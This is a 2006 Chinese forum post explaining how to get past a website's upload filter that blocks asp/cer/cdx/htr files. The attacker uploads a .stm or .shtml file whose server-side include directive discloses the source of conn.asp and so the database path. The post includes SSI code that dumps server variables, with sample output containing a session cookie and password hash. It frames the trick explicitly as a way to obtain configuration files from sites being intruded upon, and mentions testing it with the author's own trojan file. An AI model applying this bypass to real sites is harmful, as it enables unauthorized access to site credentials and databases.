服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2006-5-18 03:17:06

当网站不允许上传asp cer cdx htr文件时

<STRONG><SPAN class=tpc_title>当网站不允许上传asp cer cdx htr文件时</SPAN><BR><BR></STRONG><SPAN class=tpc_content><FONT size=2>关于web上传的问题,利用stm来上传,还能执行程序,这是一段代码: <BR>&lt;!--#ECHO var="ALL_HTTP"--&gt;&lt;br&gt; <BR>当前文件名称:&lt;!--#ECHO var="DOCUMENT_NAME"--&gt;&lt;br&gt;&lt;br&gt; <BR>Web服务器的名称和版本:&lt;!--#ECHO var="SERVER_SOFTWARE"--&gt;&lt;br&gt; <BR>主机名:&lt;!--#ECHO var="SERVER_NAME"--&gt;&lt;br&gt; <BR>端口:&lt;!--#ECHO var="SERVER_PORT"--&gt;&lt;br&gt; <BR>客户或客户代理IP地址:&lt;!--#ECHO var="REMOTE_ADDR"--&gt;&lt;br&gt; <BR>客户或客户代理主机名:&lt;!--#ECHO var="REMOTE_HOST"--&gt;&lt;br&gt; <BR>PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:&lt;!--#ECHO var="PATH_TRANSLATED"--&gt;&lt;br&gt; <BR>客户端给出附加路径信息:&lt;!--#ECHO var="PATH_INFO"--&gt;&lt;br&gt; <BR>&lt;!--#ECHO var="HTTP_ACCEPT"--&gt;&lt;br&gt; <BR>&lt;!--#ECHO var="DOCUMENT_URI"--&gt;&lt;br&gt; <BR>说保存为stm或者shtml看看,运行如下: <BR>HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate <BR>当前文件名称:F:\Web1.stm <BR>Web服务器的名称和版本:Microsoft-IIS/5.0 <BR>主机名:localhost <BR>端口:80 <BR>客户或客户代理IP地址:127.0.0.1 <BR>客户或客户代理主机名:127.0.0.1 <BR>PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:F:\Web1.stm <BR>客户端给出附加路径信息:/1.stm <BR>image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* <BR><BR><BR>当网站不允许上传<BR>asp cer cdx htr等文件时, 上传一个stm文件, 内容为:<BR>&lt;!--#include file="conn.asp"--&gt;<BR>直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦! <BR><BR>原来就是如上所说的,<BR>&lt;!--#include file="conn.asp"--&gt;<BR>就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内容。<BR>我在本地试验成功!在我的iis目录下建了一个test.stm文件,内容为:<BR>&lt;!--#include file="ok.asp"--&gt; <BR>又在同一目录下放了一个我的一个木马文件ok.asp<BR>在浏览器中请求test.stm,没有什么反映,一片空白。<BR>但是一查看源代码,狂晕,原来就是我的asp文件的内容!<BR>这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径,<BR>但是一个前提是服务器的对stm或者shtml的扩展没有删除!</FONT></SPAN>
页: [1]
查看完整版本: 当网站不允许上传asp cer cdx htr文件时